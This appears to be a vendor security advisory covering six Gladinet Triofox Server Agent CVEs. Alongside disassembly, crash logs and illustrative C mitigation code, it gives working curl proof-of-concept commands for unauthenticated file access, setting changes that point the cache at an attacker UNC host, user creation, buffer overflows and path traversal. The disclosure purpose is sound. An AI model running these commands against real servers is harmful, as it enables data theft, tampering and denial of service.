Gladinet Triofox Server Agent Multiple Vulnerabilities

Critical

Synopsis

Multiple vulnerabilities exist in Gladinet Triofox Server Agent 17.1.10488.57063.

 

CVE-2026-8364 - Missing Authentication for Critical Function (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

 

Gladinet Triofox Cloud Server Agent Access Service (GladServerAgentService.exe) listens on TCP port 7878 and processes remote HTTP messages with URL paths starting with /resources, /status, /sysinfo, /woshome, /Settings, /schedule, or /DavCache.

 

An unauthenticated remote attacker can interact with these endpoints to cause security issues. Some operations through these endpoints could trigger authenticated communications with the Triofox web portal (Access Point) with the credentials of the user currently logged into the Triofox Server Agent Management Console.  

 

The attacker can access the /resources endpoint to list, view, add, change, and delete files on the Triofox Drive (i.e., M:) mapped on the Server Agent host.

 

PoC:

 

# List content on the Triofox Drive
# <iscollection> indicates whether a returned resource is a file (0) or a directory (1) 
curl -s -X PROPFIND -H 'depth: 1' 'http://<target-host>:7878/resources' | xq | grep -Pi '(href|iscollection)'
    <a:href>/resources</a:href>
        <a:iscollection>1</a:iscollection>
    <a:href>/resources/share1</a:href>
        <a:iscollection>1</a:iscollection>
    <a:href>/resources/share2</a:href>
        <a:iscollection>1</a:iscollection>
        
curl -s -X PROPFIND -H 'depth: 1' 'http://<target-host>:7878/resources/share1' | xq | grep -Pi '(href|iscollection)'
    <a:href>/resources/share1</a:href>
        <a:iscollection>1</a:iscollection>
    <a:href>/resources/share1/dir1</a:href>
        <a:iscollection>1</a:iscollection>
    <a:href>/resources/share1/file1.txt</a:href>
        <a:iscollection>0</a:iscollection>


# Show content of an existing file on a published share
curl 'http://<target-host>:7878/resources/share1/file1.txt'
    
# Upload a malicious file to a published share
# - Require Personal Home Drive enabled in the Triofox web portal
curl -i -X PUT -d 'malicious content' 'http://<target-host>:7878/resources/share1/evil.exe'

# Change content of an existing file on a published share
# - Require Personal Home Drive enabled in the Triofox web portal
curl -i -X PUT -d 'original content replaced' 'http://<target-host>:7878/resources/share1/evil.exe'

# Delete an existing file on a published share
# - Require Personal Home Drive enabled in the Triofox web portal
curl -i -X DELETE 'http://<target-host>:7878/resources/share1/evil.exe'

 

The attacker can access the /Settings endpoint to list, view, add, change, and delete data in the GSettings table in the SQLite database C:\ProgramData\gteamclient\gsettings.db on the Server Agent host.

 

PoC:

 

# View settings 
curl 'http://<target-host>:7878/Settings'

# Change the existing CacheRoot setting
curl -i -H 'ValueType: 2' -H 'Value: \\<attacker-host>\share\cache' -X PUT  'http://<target-host>:7878/Settings/CacheRoot'

# Add a new setting (string type)
curl -i -H 'ValueType: 2' -H 'Value: ValueForNewSetting1' -X PUT  'http://<target-host>:7878/Settings/NewSetting1'

# Delete an existing setting
curl -i -H 'ValueType: 2' -H 'Value: {delete}' -X PUT  'http://<target-host>:7878/Settings/NewSetting1'

 

If the CacheRoot is changed to an attacker-controlled location (i.e., a UNC path), the attacker can view files in the mapped Triofox Drive (i.e., M:) on the server agent host if a user on the agent host opens those files.  This allows the attacker to view potentially sensitive files stored on external systems.

 

The attacker can access other valid endpoints to perform potentially dangerous operations. For example, the /profile endpoint can be used to perform various operations (e.g., AddUser, requestfile).

 

PoC:

 

// Create a Proxied AD user.
//
// A random password is generated on creation.
// The password can be reset via the "Forgot your password?" link on the login page.
// Requirements:
//  - The "Allow proxied AD user to change native password (Non AD Password)" setting under
//    DASHBOARD > SETTINGS > USER ACCOUNT & SECURITY > USER ACCOUNT needs to be enabled.
//  - Personal Home Drive enabled.
//  - Workable Email Service configured in the web portal.
curl -i -H 'PMCMethod: AddUser' -d $'[email protected]\nSid123' 'http://<target-host>:7878/profile'
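
In the Disclosure Timeline the vendor describes port 7878 as local IPC, while the requests above are answered for remote peers. As an added example (not Gladinet's code or its fix), this C code shows a pre-dispatch gate that refuses any peer that is not loopback; the function names and the 403 status are assumptions, and it uses POSIX socket headers rather than Winsock.

```c
#include <string.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

/* 1 if the peer is IPv4 127.0.0.0/8, IPv6 ::1, or an IPv4-mapped
 * IPv6 address (::ffff:127.x.x.x); 0 for everything else. */
int peer_is_loopback(const struct sockaddr *sa)
{
    if (sa == NULL) return 0;
    if (sa->sa_family == AF_INET) {
        const struct sockaddr_in *in4 = (const struct sockaddr_in *)sa;
        return (ntohl(in4->sin_addr.s_addr) >> 24) == 127;
    }
    if (sa->sa_family == AF_INET6) {
        const struct in6_addr *a = &((const struct sockaddr_in6 *)sa)->sin6_addr;
        if (IN6_IS_ADDR_LOOPBACK(a)) return 1;
        if (IN6_IS_ADDR_V4MAPPED(a)) return a->s6_addr[12] == 127;
    }
    return 0;  /* unknown address family: treat as remote */
}

/* Pre-dispatch decision (assumed convention): 0 = continue to the
 * handler, 403 = refuse before any endpoint code runs. */
int gate_request(const struct sockaddr *peer)
{
    return peer_is_loopback(peer) ? 0 : 403;
}

/* Demo helper: parse a textual address and run the gate on it.
 * Returns -1 when the text is not a valid IPv4 or IPv6 address. */
int check_text_peer(const char *text)
{
    struct sockaddr_in v4;
    struct sockaddr_in6 v6;
    memset(&v4, 0, sizeof v4);
    memset(&v6, 0, sizeof v6);
    if (inet_pton(AF_INET, text, &v4.sin_addr) == 1) {
        v4.sin_family = AF_INET;
        return gate_request((const struct sockaddr *)&v4);
    }
    if (inet_pton(AF_INET6, text, &v6.sin6_addr) == 1) {
        v6.sin6_family = AF_INET6;
        return gate_request((const struct sockaddr *)&v6);
    }
    return -1;
}
```

Binding the listener to the loopback addresses in the first place removes the remote exposure; the gate is a second check for deployments where the bind address is configurable.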

 

CVE-2026-8363 - Stack-based Buffer Overflow in WOSDeviceDropFolder.dll (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

 

A stack-based buffer overflow condition exists in WOSDeviceDropFolder.dll when processing a long URL path starting with /resources:

 

// WOSDeviceDropFolder.dll, file version 16.12.4797.56816, rebased to 0x03e70000 
[...]
.text:03E744F6  push    eax             ; attacker-controlled data after /resources/
.text:03E744F7  lea     eax, [ebp+538h+Buffer] ; VULN: fixed-sized stack buf ->
.text:03E744F7                          ; stack buf overflow!
.text:03E744FD  push    offset aGsyncS  ; "gsync_%s"
.text:03E74502  push    eax             ; Buffer
.text:03E74503  call    ds:sprintf
[...]

 

PoC:

 

curl 'http://<target-host>:7878/resources/'$(python -c "print('A'*270)")
STATUS_STACK_BUFFER_OVERRUN encountered
(14e8.1258): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=03e940d4 ecx=b7940000 edx=0678eca1 esi=00000000 edi=0678f794
eip=74b8257e esp=0678ee04 ebp=0678ee94 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
KERNELBASE!UnhandledExceptionFilter+0x8e:
74b8257e cc              int     3
0:024> 

 

CVE-2026-8362 - Stack-based Buffer Overflow in WOSDefaultHttpModule.dll (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

 

A stack-based buffer overflow condition exists in WOSDefaultHttpModule.dll when processing a long URL path starting with /woshome:

 

// WOSDefaultHttpModule.dll, file version 16.12.4797.56816, rebased to 0x166E0000 
[...]
.text:166E11D5  push    0FFFFFFFFh      ; MaxCount
.text:166E11D7  lea     eax, [ebx+DefaultHttpModule.ServerAgentDir] ; C:\Program Files\Triofox Server Agent\
.text:166E11DA  push    eax             ; Source
.text:166E11DB  lea     eax, [ebp+3B8h+FileName]
.text:166E11DE  push    207h            ; SizeInWords
.text:166E11E3  push    eax             ; Destination
.text:166E11E4  call    ds:wcsncpy_s
.text:166E11EA  lea     eax, [ebp+3B8h+FileName] ; fixed-size stack buf
.text:166E11ED  push    edi             ; attacker-controlled uri path
.text:166E11ED                          ; VULN: stack buffer overflow
.text:166E11ED                          ; VULN: path traversal
.text:166E11EE  push    eax
.text:166E11EF  call    ds:wcscat
[...]

 

PoC:

 

curl 'http://<target-host>:7878/woshome/'$(python -c "print('A'*511)")

 

CVE-2026-8361 - Path Traversal in WOSDefaultHttpModule.dll (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

 

A path traversal vulnerability exists in WOSDefaultHttpModule.dll when processing a URL path starting with /woshome (see the code snippet above for CVE-2026-8362).

 

PoC:

 

curl --path-as-is  'http://<target-host>:7878/woshome/../../../../../../../../../../windows/win.ini'
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
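
The two overflows (sprintf of "gsync_%s" in CVE-2026-8363, wcscat onto FileName in CVE-2026-8362) and the traversal in CVE-2026-8361 all come from building a path out of the request URI with no length or segment check. As an added example (not the vendor's code or its fix), the bounded forms look like this in C; the function names and return codes are assumptions, and the URI is assumed to be URL-decoded already.

```c
#include <stdio.h>
#include <string.h>
#include <wchar.h>

#define FILENAME_WORDS 0x207  /* SizeInWords passed to wcsncpy_s in the disassembly */

/* Bounded form of sprintf(Buffer, "gsync_%s", tail): fail rather than overflow. */
int format_gsync_name(char *out, size_t cap, const char *tail)
{
    int n;
    if (out == NULL || cap == 0 || tail == NULL) return -1;
    n = snprintf(out, cap, "gsync_%s", tail);
    if (n < 0 || (size_t)n >= cap) { out[0] = '\0'; return -1; }
    return 0;
}

/* 1 if any segment of rel (split on '/' or '\') is exactly "..". */
static int has_dotdot_segment(const wchar_t *rel)
{
    const wchar_t *seg = rel;
    for (;;) {
        size_t len = wcscspn(seg, L"/\\");
        if (len == 2 && seg[0] == L'.' && seg[1] == L'.') return 1;
        if (seg[len] == L'\0') return 0;
        seg += len + 1;
    }
}

/*
 * Bounded form of copying root into FileName and then wcscat(FileName, rel).
 * Returns 0 on success, -1 if the result does not fit, -2 if rel could leave root.
 */
int join_under_root(wchar_t *out, size_t cap, const wchar_t *root, const wchar_t *rel)
{
    size_t rl, pl;
    if (out == NULL || cap == 0 || root == NULL || rel == NULL) return -1;
    out[0] = L'\0';
    while (*rel == L'/' || *rel == L'\\') rel++;          /* keep rel relative */
    if (has_dotdot_segment(rel) || wcschr(rel, L':') != NULL) return -2;
    rl = wcslen(root);
    pl = wcslen(rel);
    if (rl >= cap || pl >= cap - rl) return -1;           /* root + rel + NUL must fit */
    wmemcpy(out, root, rl);
    wmemcpy(out + rl, rel, pl + 1);                       /* copies the terminator too */
    return 0;
}
```

On Windows, a production check should also canonicalise the joined path (for example with GetFullPathNameW) and confirm that the result still starts with the root directory.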

 

CVE-2026-8360 - Unchecked Return Value to NULL Pointer Dereference DOS (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

 

Calls to WOSCommonUtil.dll!WOSSysInfoGetDeviceInterface() in various DLLs (e.g., WOSProfileMgrModule.dll, WOSWebDavModule.dll) can return a NULL pointer (i.e., when no user is logged into the Triofox Server Agent Management Console). The returned pointer is not checked for NULL before being dereferenced:

 

// WOSProfileMgrModule.dll, file version 16.12.4797.56816, rebased to 0xB3D0000
[...]
.text:0B3D277F ProfileMgrModule_GetSyncFolderList proc near
.text:0B3D277F                          ; CODE XREF: ProfileMgrModule_ProcesssReq+88↓p
.text:0B3D277F  push    ebx
.text:0B3D2780  push    esi
.text:0B3D2781  push    edi
.text:0B3D2782  sub     esp, 10h
.text:0B3D2785  mov     esi, offset unk_B3D414C
.text:0B3D278A  mov     edi, esp
.text:0B3D278C  movsd
.text:0B3D278D  movsd
.text:0B3D278E  movsd
.text:0B3D278F  mov     ebx, ecx
.text:0B3D2791  movsd
.text:0B3D2792  call    ds:WOSSysInfoGetDeviceInterface
.text:0B3D2798  mov     edx, [eax]      ; VULN: returned pointer not checked for
.text:0B3D2798                          ; NULL before dereferencing
.text:0B3D279A  add     esp, 10h
.text:0B3D279D  mov     ecx, eax
.text:0B3D279F  call    dword ptr [edx+3Ch]
[...]

 

PoC:

 

curl -H 'PMCMethod: GetSyncFolderList' 'http://<target-host>:7878/profile'
curl: (56) Recv failure: Connection reset by peer

 

Crash in WinDbg:

 

(1f44.f48): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=04ac05a8 ecx=d0ea2ae0 edx=00000001 esi=0b3d415c edi=058dfc9c
eip=0b3d2798 esp=058dfc8c ebp=046eb96c iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
WOSProfileMgrModule!WOSBin_UnloaHttpModule+0x177f:
0b3d2798 8b10            mov     edx,dword ptr [eax]  ds:002b:00000000=????????
0:010>

 

CVE-2026-8359 - WOSHttpStatusModule.dll NULL Function Pointer Call DoS (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

 

When a request arrives with a URL path starting with /status or /sysinfo, WOSHttpStatusModule.dll is supposed to be loaded to handle those URL patterns, and the WOSBin_LoadHttpModule function in that DLL is then called to set up a "module" object for it. However, WOSHttpStatusModule.dll is not present in the installation. As a result, the function pointer to WOSBin_LoadHttpModule (which would have come from the export table of WOSHttpStatusModule.dll) is set to NULL, and the call goes to address 0:

 

// WOSMiniWebServer.dll, file version 16.12.4797.56816, rebased to 0xB3B0000
[...]
.text:0B3B283F  call    [edi+HttpModuleInfo.pfnLoadHttpModule] ; NULL Function Pointer Call
[...]

 

PoC:

 

curl 'http://<target-host>:7878/status'
curl: (56) Recv failure: Connection reset by peer

 

Crash in WinDbg:

 

(1164.1054): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000008 ecx=00000002 edx=00000000 esi=04df1658 edi=04d6dcb4
eip=00000000 esp=05c3f7ec ebp=05c3f830 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
00000000 ??              ???
0:012> k
WARNING: Frame IP not in any known module. Following frames may be wrong.
00 05c3f7e8 0b3b2845     0x0
01 05c3f830 0b3b26b3     WOSMiniWebServer!WOSBin_LoadDevice+0xbd5
02 05c3f858 0b3b26f2     WOSMiniWebServer!WOSBin_LoadDevice+0xa43
03 00000000 00000000     WOSMiniWebServer!WOSBin_LoadDevice+0xa82
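
Both denial-of-service issues (CVE-2026-8360 and CVE-2026-8359) come from using a pointer that can legitimately be NULL. As an added example (not the vendor's code or its fix), this C model of the dispatch path returns an HTTP error instead; the struct layouts, function names and status codes are assumptions, with only the pfnLoadHttpModule field name and the GetSyncFolderList method taken from the page.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-ins for the structures named in the disassembly. */
typedef struct DeviceInterface {
    int (*GetSyncFolderList)(struct DeviceInterface *self);
} DeviceInterface;

typedef struct HttpModuleInfo {
    const char *prefix;                /* URL prefix the module serves */
    void *(*pfnLoadHttpModule)(void);  /* NULL if the DLL or export was not found */
    void *module;                      /* set after a successful load */
} HttpModuleInfo;

/* Route a path to its module; returns an HTTP status instead of calling NULL. */
int dispatch(HttpModuleInfo *mods, size_t count, const char *path)
{
    size_t i;
    for (i = 0; i < count; i++) {
        HttpModuleInfo *m = &mods[i];
        if (strncmp(path, m->prefix, strlen(m->prefix)) != 0) continue;
        if (m->module == NULL) {
            if (m->pfnLoadHttpModule == NULL) return 503;  /* module not installed */
            m->module = m->pfnLoadHttpModule();
            if (m->module == NULL) return 500;             /* load failed */
        }
        return 200;
    }
    return 404;
}

/* GetSyncFolderList handler: the interface getter may return NULL. */
int get_sync_folder_list(DeviceInterface *(*get_device)(void))
{
    DeviceInterface *dev = (get_device != NULL) ? get_device() : NULL;
    if (dev == NULL || dev->GetSyncFolderList == NULL) return 503;  /* no console session */
    return dev->GetSyncFolderList(dev);
}

/* Constructed fixtures for the example. */
static int list_ok(DeviceInterface *self) { (void)self; return 200; }
static DeviceInterface g_dev = { list_ok };
DeviceInterface *device_logged_in(void) { return &g_dev; }
DeviceInterface *device_logged_out(void) { return NULL; }
void *load_ok(void) { static int module; return &module; }

/* Status for path against a table where /status has no loader resolved. */
int demo_dispatch(const char *path)
{
    HttpModuleInfo mods[] = { { "/resources", load_ok, NULL }, { "/status", NULL, NULL } };
    return dispatch(mods, 2, path);
}
```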

Solution

Upgrade to version 17.3.10565.57509 or later.

Disclosure Timeline

February 11, 2026: Tenable sends request for security contact.
February 11, 2026: Gladinet replies with a security contact; Tenable sends disclosure.
February 25, 2026: Tenable asks Gladinet to confirm receipt of the disclosure.
February 25, 2026: Gladinet replies that they have received the disclosure and are implementing mitigations for the next release cycle. Gladinet notes that a typical deployment for the product is on internal, non-internet-facing file servers.
February 25, 2026: Tenable replies asking for timeline for next release cycle and clarifying points around host based firewall.
March 2, 2026: Gladinet replies that the port in question is used for local IPC and does not accept network connections.
April 2, 2026: Tenable replies that the default state of the service is bound to a non-local interface and requests an update.
April 15, 2026: Tenable inquires about a status update.
April 23, 2026: Gladinet replies that the issue was fixed in March.
April 29, 2026: Tenable asks what the fix version was, if a CVE was reserved and if there are release notes we can link to.
